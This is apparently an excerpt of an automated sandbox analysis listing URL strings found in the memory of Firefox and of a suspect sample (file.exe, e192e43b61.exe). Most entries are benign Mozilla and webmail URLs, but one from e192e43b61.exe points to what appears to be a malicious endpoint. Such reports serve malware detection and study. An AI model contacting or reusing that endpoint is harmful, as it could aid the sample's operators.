Source: firefox.exe, 0000001D.00000003.2861629695.000001E762700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2869871266.000001E76297B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3011870817.000037E83F604000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E7637B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3012022176.000037F743104000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/DeferredTask.sys.mjshttp://compose
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1BrowserInitState.startupIdleTaskPromise
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001D.00000002.2976416417.000001E75FE03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001D.00000003.2861629695.000001E762700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2869871266.000001E76297B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsasyncEmitManifestEntry(
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881C:
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001D.00000002.2964932071.000001E75E67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001D.00000002.2992758898.000001E7637B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%Attempt
Source: firefox.exe, 0000001D.00000002.2992758898.000001E7637C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E76378A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2987595176.000001E762D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2976416417.000001E75FE21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FDD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource:///modules/BrowserContentHandler.sys.mjss
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://gre/modules/handlers/HandlerList.sys.mj
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sCan
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sScheme
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2955106076.000001E752CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.comtestPermissionFromPrincipalhttps://addons.mozilla.orghttps://screenshots.
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001D.00000002.3011405612.00002751D9304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store:443/apik
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/recordDataMigrationResult
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
